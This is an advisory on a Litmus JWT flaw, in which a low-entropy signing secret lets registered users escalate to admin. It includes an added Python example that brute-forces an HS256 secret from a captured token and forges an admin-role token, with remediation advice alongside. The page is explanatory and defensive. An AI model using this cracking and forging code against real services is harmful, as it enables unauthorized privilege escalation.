Lack of entropy allows registered low-privileged users of Litmus to crack valid JWT tokens and gain admin privileges
Litmuschaos:litmus
(,3.23.0)
The Litmus platform uses JWT for authentication and authorization, but the secret used to sign those tokens effectively has only 6 bytes of entropy, which makes it trivial to brute-force. Any registered user already holds a valid token, so the secret can be recovered offline from that token alone; the attacker can then sign tokens with arbitrary claims, including administrator privileges.
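The following Python is an added example, not code from the Litmus project, showing why a low-entropy HMAC secret is fatal for JWT: a token issued to a low-privileged user is enough to brute-force the secret offline, after which the attacker mints a token with whatever claims they like. It assumes HS256 and a hypothetical `role` claim (the page does not describe the actual claim layout). The demo secret is shortened to 3 characters so the search finishes in seconds; a 6-byte secret gives at most 2^48 candidates, which is well within reach of GPU cracking tools (hashcat supports JWT directly). The same search against a 32-byte random secret finds nothing.

```python
"""Offline brute-force of an HS256 JWT signing secret (added example, not Litmus code)."""
import base64
import hashlib
import hmac
import itertools
import json
import os
import string
from typing import Optional


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(data: str) -> bytes:
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Build a compact JWT: base64url(header).base64url(payload).base64url(HMAC-SHA256)."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{payload}".encode("ascii")
    sig = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """Return the claims if the signature matches, else None (constant-time compare)."""
    header, payload, sig = token.split(".")
    signing_input = f"{header}.{payload}".encode("ascii")
    expected = hmac.new(secret, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        return None
    return json.loads(b64url_decode(payload))


def crack_secret(token: str, alphabet: str, max_len: int) -> Optional[bytes]:
    """Try every secret over `alphabet` up to `max_len` characters against one captured token.

    Nothing here touches the server: the attacker only needs a token they were legitimately issued.
    """
    header, payload, sig = token.split(".")
    signing_input = f"{header}.{payload}".encode("ascii")
    target = b64url_decode(sig)
    for length in range(1, max_len + 1):
        for candidate in itertools.product(alphabet, repeat=length):
            secret = "".join(candidate).encode("ascii")
            if hmac.new(secret, signing_input, hashlib.sha256).digest() == target:
                return secret
    return None


def forge_admin_token(token: str, alphabet: str, max_len: int) -> Optional[str]:
    """Recover the secret from a low-privileged token, then re-sign it with an admin role claim."""
    secret = crack_secret(token, alphabet, max_len)
    if secret is None:
        return None
    claims = verify_hs256(token, secret)
    claims["role"] = "admin"  # hypothetical claim name; the real claim set is not on the page
    return sign_hs256(claims, secret)


# Constructed demo inputs: a 3-character secret drawn from lowercase+digits (36^3 = 46,656 candidates)
# stands in for the short real-world secret so the search finishes quickly.
ALPHABET = string.ascii_lowercase + string.digits
WEAK_SECRET = b"k3y"
USER_CLAIMS = {"sub": "alice", "role": "user"}  # constructed low-privilege claims
WEAK_TOKEN = sign_hs256(USER_CLAIMS, WEAK_SECRET)

# Hardened counterpart: a 32-byte random secret (256 bits, the minimum RFC 7518 requires for HS256).
STRONG_SECRET = os.urandom(32)
STRONG_TOKEN = sign_hs256(USER_CLAIMS, STRONG_SECRET)


if __name__ == "__main__":
    recovered = crack_secret(WEAK_TOKEN, ALPHABET, 3)
    print("recovered secret:", recovered)
    forged = forge_admin_token(WEAK_TOKEN, ALPHABET, 3)
    print("forged token verifies as:", verify_hs256(forged, WEAK_SECRET))
    print("same search vs 256-bit secret:", crack_secret(STRONG_TOKEN, ALPHABET, 3))
```

The search space scales as alphabet^length, so the exhaustive loop above is only practical for the toy secret; against a real 6-byte secret an attacker would feed the captured token to a GPU cracker instead. The fix on the verifying side is not in the verifier at all but in key generation: HS256 secrets must be at least 256 bits of CSPRNG output (or the service should move to an asymmetric algorithm such as RS256/ES256), and any secret that was ever short should be treated as compromised and rotated, which invalidates all outstanding tokens.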
No PoC is supplied for this issue
No mitigations are supplied for this issue